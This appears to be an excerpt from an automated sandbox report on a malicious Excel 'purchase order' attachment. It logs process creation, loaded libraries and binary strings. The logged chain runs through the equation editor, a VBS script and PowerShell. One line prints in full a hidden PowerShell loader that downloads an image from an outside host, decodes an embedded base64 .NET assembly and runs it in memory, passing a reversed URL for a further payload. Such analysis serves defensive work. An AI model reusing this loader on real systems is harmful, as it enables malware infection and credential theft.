            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Mac Purchase Order PO102935.xls Virustotal: Detection: 9%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
            Source: C:\Windows\SysWOW64\find.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: mozglue.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: cryptui.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: riched32.dll
            Source: C:\Windows\SysWOW64\find.exe Section loaded: riched20.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\SysWOW64\find.exe File opened: C:\Windows\SysWOW64\RichEd32.dll
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466622226.0000000001EC0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466090226.0000000001D60000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.0000000002050000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: find.pdb source: RegAsm.exe, 0000000B.00000002.466574369.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000002.620877764.0000000000654000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
